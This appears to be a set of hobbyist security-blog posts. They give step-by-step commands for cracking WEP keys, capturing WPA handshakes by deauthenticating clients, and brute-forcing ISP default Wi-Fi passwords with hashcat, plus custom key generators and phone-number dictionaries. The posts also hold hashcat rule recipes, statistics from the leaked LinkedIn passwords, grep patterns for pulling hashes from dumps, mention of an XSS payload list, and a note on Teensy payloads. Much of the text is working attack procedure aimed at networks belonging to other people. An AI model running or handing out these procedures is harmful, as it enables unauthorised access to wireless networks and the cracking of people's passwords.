INIT_6

When hacking android apps I learned today that you can convert a IP address into a 10digit decimal number. This number is still valid in any web browser. I wrote two python programs to go both ways ;)

Used http://www.iowight.com/iwindex/decimal.php3 for the math.

From 10digit decimal to ip address:

#convert 10digit decimal formated ipaddress to normal ipaddress
#by init6
#blog.init6.me

import sys

def main():
    #read file and convert each line to ip address. Comment out to ask for input.
    with open('c:\ipaddress.txt', 'r') as infile:
        for line in infile:
            print (convert(int(line)))
    infile.close()

    #ask for input (dec format) Uncomment to ask for input.
    #decIn = input("Enter 10 digit decimal formated ipaddress: ")
    
def convert(decIn):

    if is32(decIn) == True:
        #convert dec to hex
        fullHex = hex(decIn).lstrip("0x")

        #Split hex number into four pairs
        hex1 = fullHex[0:2]
        hex2 = fullHex[2:4]
        hex3 = fullHex[4:6]
        hex4 = fullHex[6:8]
        #Convert each hex to decimal then to a string and return ip address.
        ipAddr = ( str(int(hex1,16)) + '.' + str(int(hex2,16)) + '.' + str(int(hex3,16)) + '.' + str(int(hex4,16)) )
        return ipAddr
    
#Checks to see if input is a 32bit int or less to make sure its a vaild ip address.         
def is32(n):
    try:
        bitstring=bin(n)
    except (TypeError, ValuueError):
        return False

    if len(bin(n)[2:]) <= 32:
        return True
    else:
        print ("Not a vaild 32bit 10 digit decimal")
        return False
    
main()

From IP Address to 10 digit decimal.

cmyip.com changed the way they encoded the numbers so I could no longer pull the ip address directly from the source code. Instead of trying to decode the htmlnumbers to ascii not only because its hard but they have it setup to change the encoding. So now, Grab the source code and feed it through w3m browser and dump it back out to the terminal then grep the IP Address.

http://pastie.org/5454850

#!/bin/bash
ip_addr=`curl -s http://cmyip.com | w3m -T text/html -dump | grep -o -E '[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}'`
echo $ip_addr

My previous post had a few problems with the script. Then I had updated the script to work properly. http://pastie.org/5101804  However, it was still way to slow. Asked around and found the following solution.  

http://pastie.org/5104479

#Python 3
#Name: 2wire.py
#by: INIT_6
#Count from 0000000000 - 9999999999 skipping any numbers that repeat them selfs more then 3 times like 333

import sys
from threading import Thread

def count1(first, ver):
    MAX_INT = 999000000
    BAD_PATTERNS = {x * 3 for x in '0123456789'}
    # Use xrange for Python 2.7
    for number in range(MAX_INT):
        int_string = str(number).rjust(9, '0')
        if any(pattern in int_string for pattern in BAD_PATTERNS):
            continue
        print ( str(first) + str(number).rjust(9, '0') )

if __name__ == '__main__':
    for x in '0123456789':
        try:
            Thread(target=count1, args=(x,1)).start()
    
        except: # Exception, errtxt:
           print ( errtxt )

Still have some work. I need to test the threading better and set up a queue so it will only start as many threads as the computer can handle.

There are 100's if not 1000's of guides out there on how to crack WEP. This will mostly be a quick and dirty reference guide for a few friends trying to crack WEP them self's.

Aircrack-ng's guide to cracking WEP

Download and boot off of backtrack 5 r3 To install it on a flash drive use linux/windows tool YUMI

First you want to see what kind of wifi connection you have to choose from. Start your wireless interface in monitor mode.

#airmon-zc start wlan0 
#airodump-ng --encrypt wep mon0

You should see several AP. Record the BSSID, ESSID, and Channel along with any associated clients shown at the bottom of airodump-ng.

Once you find a couple targets on the same channel. You need to close airodump and stop airmon

#airmon-zc stop mon0 

Start airmon-zc on the channel of the target. (with WEP its not as necessary to lock the channel in on the driver as you have to with WPA)

#airmon-zc start wlan0 <Channel Number>

Then start airodump on the same channel along with some other options.

#airodump-ng mon0 --encrypt wep --ivs --write <FILENAME> --output-format pcap -a --channel <Channel number>

Now you need to inject packets. This will send packets to the access point as the other associated client generating your golden IVS you need to crack the WEP. 

#aireplay-ng mon0 -1 0 -e "essid" -a <access point MAC address> -h <MAC address of an associated client> 

If the above isn't generating any IVs you might need to tweak your command line. 

#aireplay-ng mon0 -1 <a number between 30-6000> -o <a number between 1-30> -q 10 -e "essid" -a <access point MAC address> -h <MAC address of an associated client> 




18:22:32  Sending Authentication Request
18:22:32  Authentication successful
18:22:32  Sending Association Request
18:22:32  Association successful :-)
18:22:42  Sending keep-alive packet
18:22:52  Sending keep-alive packet
# and so on.

8:28:02  Sending Authentication Request
18:28:02  Authentication successful
18:28:02  Sending Association Request
18:28:02  Association successful :-)
18:28:02  Got a deauthentication packet!
18:28:05  Sending Authentication Request
18:28:05  Authentication successful
18:28:05  Sending Association Request
18:28:10  Sending Authentication Request
18:28:10  Authentication successful
18:28:10  Sending Association Request


You can also do a ARP request replay attack. Either at the same time or in lieu of the above attack. 

#aireplay-ng mon0 -3 -b <MAC address of Access point> -h <MAC address of associated client>



 Saving ARP requests in replay_arp-0321-191525.cap
 You should also start airodump-ng to capture replies.
 Read 629399 packets (got 316283 ARP requests), sent 210955 packets...


Now to crack the IV's you have obtain. There are a lot of different options at this point. For example. AT&T U-verse default wep is only numbers. Verizon FIOS wep is 0-9A-F. Doing home work on the default SSID might lead to a quicker crack.

Static WEP cracking options:

-c     Search alpha-numeric characters only.

-t      Search binary coded decimal characters only.

-n <nbits>

Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc., until 512 bits of length. The default value is 128.

-f <fudge>

By default, this parameter is set to 2. Use a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelihood of success.

-k <korek>

There are 17 KoreK attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.

#aircrack-ng <any static WEP cracking options above> <filename>.cap

It will ask you to select your network you want to crack and show how many IV's it currently has. 

I only use the -f 1 option to get keys that are to easy and are thought to be false positives i.e. 123456789 or 111111111 

and remember a few quick google searches on the SSID (if its a default SSID) can save you a lot of time. 

Side note: if you run:

#iwconfig wlan0

And your power isn't set correctly to your gear you can change this by.

#iwconfig wlan0 twpower <dbi>


This is not a complete guide of everything you can do. Its just what I do and have a high success rate. if you have any questions feel free to drop me a e-mail/Gtalk at init6@init6.me 

Part 2. Cracking AT&T WPA1/2 with python script and hashcat.

Once you get the four way handshake from part 1.

My python script can be found here. It creates a CPU pool based on how many cores you have. Based on python 2.7.3 and Linux OS.

What the script does is count from 000000000 to 9999999999 skipping any number that has three repeating numbers in a row.  so you wont have keys like 1234555678 because it repeats 5 three times. This is because AT&T decided to make their numbers to random cutting their key space down. Its faster to count through and skip past repeating numbers then to process each number.

To change what the programs start on open it and change the following line to whatever you want:

start = str(7)

To run the program pipe it to hashcat-plus.

python 2wireWPAiter.py | ./oclHashcat-plus64.bin -m 2500 -a 0 --gpu-accel=160 --gpu-loops=1024 ../dir/2WIREHandShake.hccap


With a AMD driver 12.8 and SDK 2.7 I get about 86K keys  per second. With the built in brute-force I get 114K keys per second. Still working on how to improve my out put speed. 

To get more info on hashcat look here.

straight brute force on known key starting with 7 saved over an hour.

Screen shots.. With script                without script 


Someone in the hashcat room just told me a better way of doing this to make it even faster and more accurate. using http://hashcat.net/wiki/doku.php?id=statsprocessor making a hcstat file. Utilizing Markov chains. I will do this later tonight and post my results.

Edit: you can't use Markov chains with hashcat for this. 

Part 1. Getting the handshake.

Aircrack's site has a pretty good tutorial.

Boot from Back Track 5 R3

First you want to see what kind of wifi connection you have to choose from. Start your wireless interface in monitor mode.

#airmon-zc start wlan0
#airodump-ng --encrypt wpa mon0 

You should see several AP. Record the BSSID and Channel along with any associated clients shown at the bottom of airodump-ng.

Once you find a couple targets on the same channel. You need to close airodump and stop airmon

#airmon-zc stop mon0

Start airmon-zc on the channel of the target.

#airmon-zc start wlan0 <Channel Number>

Then start airodump on the same channel along with some other options.

#airodump-ng mon0 --encrypt wpa --write FILENAME --output-format pcap -a --channel <Channel number>

Channel number need to be the same as your target to so you can get the full four way handshake between the client and the AP.  Airodump should show in the top right hand corner once you get a handshake.

Instead of waiting around for a client to connect you can deauthenticate a client and wait for it to auto reconnect.

#aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

• -0 means deauthentication
• 5 is the number of deauths to send
• -a 00:14:6C:7E:40:80 is the MAC address of the access point
• -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
• mon0 is the interface name

If you are using backtrack you can easily check your .pcap file to see if it has a proper handshake by using pyrit. or you can load up wireshark and run a filter for EAPOL what I will show in a future post.

#pyrit -r FILENAME.pcap analyze 

The output should tell you if you have good EAPOL handshake or workable or nothing at all if none are found.

To strip out all the crap out of your pcap file expect for your handshakes run the following:

#pyrit -r FILENAME.pcap -o OUTPUT.pcap strip

To turn your pcap file into a hashcat-plus friendly file you can upload it to https://hashcat.net/cap2hccap/ or use the steps they tell you to convert it your self. I just use their site.

Link to information about Hashcat rule based attack.

Besides the out of box rules and some of the amazing rules atom and his team comes up with. I will be updating this post from time to time adding new rules I come up with or others give me the idea to come up with.

malik51: and i where talking. I was trying to get ?d?s to be preappended and appended to a pass. As running two rules one appending and one preappending is slow and doesn't work.  After much frustration I had one good idea what I will share below. His solution.

./mp64.bin -1 ?d?s '$?1 $?1 Y2 }}' -o malik51roll2.rule
./mp64.bin -1 ?d?s '$?1 $?1 $?1 Y3 }}}' -o malik51roll3.rule

This will add the same to both sides. !@pass!@ or 123pass123. Works great, and its fast.

However, I wanted more.  I wanted passwords like 1@pass$% or 123pass#$%  What I thought was the solution to the above actual works for this. It will first reverse the pass. ssap then append the digit or special character ssap@1 then reverse the word again. 1@pass  Then finally append the next set to get you 1@pass$%

./mp64.bin -1 ?d?s 'r $?1 $?1 r $?1 $?1' -o init6reverse.rule

However, this only works for two spots. you cant do 123pass#$% just to big.

In the spirit of the malik51roll2.rule I made the ldsUroll.rule
./mp64.bin -1 ?l?d?s?u '$?1 $?1 Y2 }}' -o ldsUroll.rule
It appends and presppends lowercase, digits, special, and uppercase.


EDIT: 8/12/2012 4:13AM

The following haven't found that many, but they found some.


bible verse numbers:

./mp64.bin -1 123456 -2 12 '$: $?d $?d' -o biblenum1.rule
./mp64.bin -1 123456 -2 12 '$: $1 $?d $?d' -o biblenum2.rule
./mp64.bin -1 123456 -2 12 '$  $: $?d $?d' -o biblenum1a.rule
./mp64.bin -1 123456 -2 12 '$  $: $1 $?d $?d' -o biblenum2a.rule
./mp64.bin -1 123456 -2 12 '$?d $: $?d $?d' -o biblenum3.rule
./mp64.bin -1 123456 -2 12 '$?d $: $1 $?d $?d' -o biblenum4.rule
./mp64.bin -1 123456 -2 12 '$?1 $?d $: $?d $?d $?d' -o biblenum5.rule
./mp64.bin -1 123456 -2 12 '$?1 $?d $: $1 $?d $?d $?d' -o biblenum6.rule
./mp64.bin -1 123456 -2 12 '$1 $5 $0 $: $?2 $?d $?d $?d' -o biblenum7.rule

biblenum* >> bible.rule



append : 1-3 everything

./mp64.bin -1 ?d?s?l?u '$: $?1' -o append1.rule
./mp64.bin -1 ?d?s?l?u '$: $?1 $?1' -o append2.rule
./mp64.bin -1 ?d?s?l?u '$: $?1 $?1 $?1' -o append3.rule

append* >> append.rule



Append clock both 12 and 24 hour

./mp64.bin -1 12 -2 1234 -3 12345 '$?1 $?2 $: $?3 $?d' -o clock.rule

#haven't tried this, most likly to large.
./mp64.bin -1 12 -2 1234 -3 12345 '$?1 $?2 $: $?3 $?d $: $?d $?d' -o clockSeconds.rule

Number of Linkedin passwords analysed: 4,769,941

Passpal.rb output. See the full report here. 

I also ran some other reports. Just the masked hashes that were zeroed out for the first 5 bytes can be found here.
Just the normal hashes that didn't have the zeroed out bytes report can be found here. 


Base word (len>=3) frequency, sorted by count, top 20
+-----------------------------+
|   Word   | Count | Of total |
+-----------------------------+
| linkedin |  3674 | 0.077 %  |
| link     |  2282 | 0.0478 % |
| linked   |  1905 | 0.0399 % |
| alex     |  1089 | 0.0228 % |
| mike     |  1075 | 0.0225 % |
| may      |  1032 | 0.0216 % |
| love     |   967 | 0.0203 % |
| Linkedin |   865 | 0.0181 % |
| june     |   860 | 0.018 %  |
| john     |   852 | 0.0179 % |
| blue     |   788 | 0.0165 % |
| jan      |   765 | 0.016 %  |
| jack     |   746 | 0.0156 % |
| july     |   709 | 0.0149 % |
| password |   701 | 0.0147 % |
| sam      |   695 | 0.0146 % |
| pass     |   693 | 0.0145 % |
| chris    |   663 | 0.0139 % |
| mark     |   628 | 0.0132 % |
| dec      |   624 | 0.0131 % |
+-----------------------------+

Length frequency, sorted by length, full table
+------------------------------+
| Length |  Count  | Of total  |
+------------------------------+
|      1 |      28 | 0.0006 %  |
|      2 |      25 | 0.0005 %  |
|      3 |      23 | 0.0005 %  |
|      4 |       5 | 0.0001 %  |
|      5 |       2 | 0.0 %     |
|      6 |  578859 | 12.1354 % |
|      7 |  596636 | 12.5081 % |
|      8 | 1567986 | 32.8718 % |
|      9 |  822634 | 17.246 %  |
|     10 |  567261 | 11.8923 % |
|     11 |  290798 | 6.0964 %  |
|     12 |  174207 | 3.6521 %  |
|     13 |   87247 | 1.8291 %  |
|     14 |   49301 | 1.0336 %  |
|     15 |   23493 | 0.4925 %  |
|     16 |    9970 | 0.209 %   |
|     17 |     801 | 0.0168 %  |
|     18 |     383 | 0.008 %   |
|     19 |     161 | 0.0034 %  |
|     20 |      81 | 0.0017 %  |
+------------------------------+


Charset frequency, sorted by count, full table
+-------------------------------------------------------------------------+
|           Charset            |  Count  | Of total  |   Count/keyspace   |
+-------------------------------------------------------------------------+
| lower-upper-numeric-symbolic | 4707243 | 98.6844 % | 49549.926315789475 |
| lower-upper-numeric          | 4320927 | 90.5855 % |  69692.37096774194 |
| lower-numeric-symbolic       | 3605939 | 75.5962 % | 52259.985507246376 |
| lower-numeric                | 3402358 | 71.3283 % |  94509.94444444444 |
| lower-upper-symbolic         | 1275390 | 26.7377 % | 15004.588235294117 |
| lower-upper                  | 1202678 | 25.2134 % | 23128.423076923078 |
| lower-symbolic               | 1104595 | 23.1571 % | 18721.949152542373 |
| lower                        | 1055703 | 22.1321 % |  40603.96153846154 |
| upper-numeric-symbolic       |  299598 | 6.2809 %  |             4342.0 |
| upper-numeric                |  286005 | 5.9959 %  |  7944.583333333333 |
| numeric-symbolic             |  204379 | 4.2847 %  |             4753.0 |
| numeric                      |  200999 | 4.2138 %  |            20099.9 |
| upper-symbolic               |   28394 | 0.5953 %  |  481.2542372881356 |
| upper                        |   26797 | 0.5618 %  | 1030.6538461538462 |
| symbolic                     |     133 | 0.0028 %  |   4.03030303030303 |
+-------------------------------------------------------------------------+

Charset frequency, sorted by count/keyspace, full table
+-------------------------------------------------------------------------+
|           Charset            |  Count  | Of total  |   Count/keyspace   |
+-------------------------------------------------------------------------+
| lower-numeric                | 3402358 | 71.3283 % |  94509.94444444444 |
| lower-upper-numeric          | 4320927 | 90.5855 % |  69692.37096774194 |
| lower-numeric-symbolic       | 3605939 | 75.5962 % | 52259.985507246376 |
| lower-upper-numeric-symbolic | 4707243 | 98.6844 % | 49549.926315789475 |
| lower                        | 1055703 | 22.1321 % |  40603.96153846154 |
| lower-upper                  | 1202678 | 25.2134 % | 23128.423076923078 |
| numeric                      |  200999 | 4.2138 %  |            20099.9 |
| lower-symbolic               | 1104595 | 23.1571 % | 18721.949152542373 |
| lower-upper-symbolic         | 1275390 | 26.7377 % | 15004.588235294117 |
| upper-numeric                |  286005 | 5.9959 %  |  7944.583333333333 |
| numeric-symbolic             |  204379 | 4.2847 %  |             4753.0 |
| upper-numeric-symbolic       |  299598 | 6.2809 %  |             4342.0 |
| upper                        |   26797 | 0.5618 %  | 1030.6538461538462 |
| upper-symbolic               |   28394 | 0.5953 %  |  481.2542372881356 |
| symbolic                     |     133 | 0.0028 %  |   4.03030303030303 |
+-------------------------------------------------------------------------+


Total characters: 40923061
Unique characters: 343
Top 50 characters: ae1inrosl02tmd3cuhk947b85gp6yjfvwzxASML!BR@CTEDNPI

Character frequency, sorted by count, top 20
+--------------------------------+
| Character |  Count  | Of total |
+--------------------------------+
| a         | 3018713 | 7.3766 % |
| e         | 2503293 | 6.1171 % |
| 1         | 2021211 | 4.9391 % |
| i         | 2015863 | 4.926 %  |
| n         | 1894225 | 4.6287 % |
| r         | 1760160 | 4.3011 % |
| o         | 1723761 | 4.2122 % |

Symbol frequency, sorted by count, top 20
+-----------------+
| Symbol | Count  |
+-----------------+
| !      | 111239 |
| @      | 100945 |
| #      |  44236 |
| .      |  43380 |
| *      |  40449 |
| _      |  32678 |
| -      |  29112 |
| &      |  14655 |

To search for SHA1 in file:
cat FILE | grep -o -E -e "[0-9a-f]{40}" | sort | uniq -u > all-SHA1

To search for SHA-256 in file:
cat FILE | grep -o -E -e "[0-9a-f]{64}" | sort | uniq -u > all-SHA256

To search for SHA-512 in file:
cat FILE | grep -o -E -e "[0-9a-f]{128}" | sort | uniq -u > all-SHA512

To search for MD5 in file:
cat FILE | grep -o -E -e "[0-9a-f]{32}" | sort | uniq -u > all-md5

To search for MD5crypt in file:
cat FILE | grep '^\$1\$' | cut -d: -f2- | sort | uniq -u > all-md5crypt

To search for NTLM in file:
cat FILE | grep -o -E -e ':\$NT\$[[:alnum:]]{32}:' | sort | uniq -u > all-NTLM
cat FILE | grep -o -E -e ':\$NT\$[[:alnum:]]{30,34}:' | sort | uniq -u > all-NTLM

Cross-Site-Scripting preset list for Burp suite.

Download the file. http://pastie.org/4160616 you can just save it as a .txt file and load it in the intruder as a preset file. File includes Alert and Prompt. Prompt helps when Alert has been filtered.

If you don't know how to use Burp here is a pretty good tutorial

In the Texas area I have noticed that all Time Warner Cable wireless access points are setup with the home owners home phone number. 


When I say all I really mean the 3 I have ran across but close enough for me. 


Using http://www.telcodata.us/ collected data for all phone numbers in Texas that belong to Time Warner. Cleaned the file up using a quick and dirty python program. TimeWarnerNum.dict 


First you need to collect the 4-way handshake.


Using oclHashCat-Plus to crack the WPA1/2 password. This is optimized for my AMD graphics card you can change the settings for your card. 


./oclHashcat-plus -m 2500 capture.hccap -a 6 -o TimeWarnerNum.dict ?d?d?d?d --output-format=6 --gpu-accel=32 --gpu-loops=256 --perm-min=10 --perm-max=10


This will append every possible digit to all the numbers Time Warner own. Because they own subset numbers like 972-966-7 if you don't set the min and max to 10 you will create 11 digit numbers.

Getting Pyrit to work with OpenCL and posgreSQL database. On Kubuntu 12.04 With a AMD Radon HD 7950 card.


You have to install AMD catalysis drivers and the AMD SDK. Make sure you install whatever one is older first then the newer one so you don't corrupt your install. This will change as they update the catalysis drivers and the SDK at different times. 


Go AMD and download and install the drivers for your card. here  
This page will help you install your drivers. here


Restart after install.


Download the latest SDK. here
This page will help you install your SDK. here


Restart after install.


name@box$: env


Check and make sure you have the following:


AMDAPPSDKROOT =/opt/AMDAPP/
LD_LIBRARY_PATH=/opt/AMDAPP/lib


Make sure everything is running correctly and the protocol is running by:
This has to be ran as a normal user. Application doesn't work as root.
name@box$: fglrxinfo




Some decencies that I ran into. This list my not be complete. 

apt-get install cmake libroot-python-dev libboost1.40-all-dev subversion libpcap-dev libssl-dev python-dev zlib1g-dev python-scapy libpcap0.8-dev libpq-dev 


install easy_install fuction. Follow the steps here
Now you can run:


name@box$: sudo easy_install SQLAlchemy
name@box$: sudo easy_install psycopg2



Now we are ready to install pyrit.


name@box$: wget https://pyrit.googlecode.com/files/pyrit-0.4.0.tar.gz
name@box$: wget https://pyrit.googlecode.com/files/cpyrit-opencl-0.4.0.tar.gz


name@box$ tar xvzf pyrit-0.4.0.tar.gz
name@box$ tar xvzf cpyrit-opencl-0.4.0.tar.gz


name@box$ cd pyrit-0.4.0
name@box$ sudo python setup.py build
name@box$ sudo python setup.py install


name@box$ cd ../cpyrit-opencl-0.4.0
name@box$ nano setup.py


You need to edit the setup.py file to match the below:




LIBRARIES.append('OpenCL') 
try: if os.path.exists(os.environ['AMDAPPSDKROOT']): OPENCL_INC_DIRS.append(os.path.join(os.environ['AMDAPPSDKROOT'], 'include')) 
    for path in ('lib/x86_64','lib/x86'): 
         if       os.path.exists(os.path.join(os.environ['AMDAPPSDKROOT'], path)):  OPENCL_LIB_DIRS.append(os.path.join(os.environ['AMDAPPSDKROOT'], path)) break except: pass for path in ('/opt/AMDAPP/include', \ '/opt/AMDAPP/include/CL'):


ctrl+o to save
ctrl+x to exit


name@box$ sudo python setup.py build
name@box$ sudo python setup.py install




install postgresql 9 from website
install pgadmin3 from ubuntu software center.


Setup new user and database. 
User:2wire 
password: putitinme  
Database: 2wireDB


To have pyrit connect to your database do the following
name@box$ pyrit -u postgresql://2wire:putitinme@127.0.0.1/2wireDB [pyrit command]


Now if you don't want to type out all that non-sense each time edit the following file:


name@box$ nano ~./pyrit/config


Change where it says file:// to read postgresql://2wire:putitinme@127.0.0.1/2wireDB


Ctrl+o to save
Ctrl+x to exit


now you can simply run pyrit


name@box$ pyrit [pyrit command]


Now it will automatically connect to the database. 


Might have left out a few steps if you run across this page and need some help feel free to hit me up. I know pages just like this helped me install pyrit.

Quick way to get a decent speed test on the command line.








#!/bin/bash
curl -o /dev/null http://download.thinkbroadband.com/1GB.zip


Just got a seedbox. snooped around a little. Make sure everything was setup right before I started to use it.

Noticed that in the /tmp/ directory it was storing all the .torrent files. cat a few of them sure enough peoples hashes from all the users on that box. It was a problem in deluge.

file: json_api.py
Line: tmp_file = os.path.join(tempfile.gettempdir(), url.split("/")[-1])


Patch submitted by admin I brought it up to:http://dev.deluge-torrent.org/attachment/ticket/2112/json_api_patch.diff
http://dev.deluge-torrent.org/ticket/2112

This is bad because you are not spouse to leak your hash to other people. You can download files under the other persons ID. It can also create lots of other problems I wont get into.

EDIT: They changed the way the numbers are encoded. See updated post: http://blog.init6.me/2012/11/update-cmyip.html


Just a little script that will echo back your current public IP address. Nice for when you are on a terminal and don't want to fire off any text browsers. etc.

#!/bin/bash
ip_addr=`curl -s http://cmyip.com | grep -o -E '[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}'`
echo $ip_addr


New Teensy Code: 
Exploit/payload:
En/Decode base64.vbs
BSOD.hta


This new code just writes out the payload to the command prompt after you type memexe that way you dont have to write the file to the filesystem before passing it to memexe speeds things up.

My Zeus slides from DC214 presentation.